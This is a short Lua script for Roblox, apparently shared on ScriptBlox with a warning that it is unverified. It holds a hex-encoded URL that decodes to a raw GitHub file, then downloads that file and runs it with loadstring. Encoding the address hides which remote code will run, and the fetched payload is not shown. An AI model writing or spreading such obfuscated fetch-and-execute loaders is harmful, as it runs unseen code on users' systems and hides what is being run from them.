--[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] local encodedURL = "687474703a2f2f7261772e6769746875622e636f6d2f4e696e6a6131303930382f4b65792f726566732f68656164732f6d61696e2f4469636b" local function hexToStr(hex) return hex:gsub("..", function(byte) return string.char(tonumber(byte, 16)) end) end local decodedURL = hexToStr(encodedURL) loadstring(game:HttpGet(decodedURL))()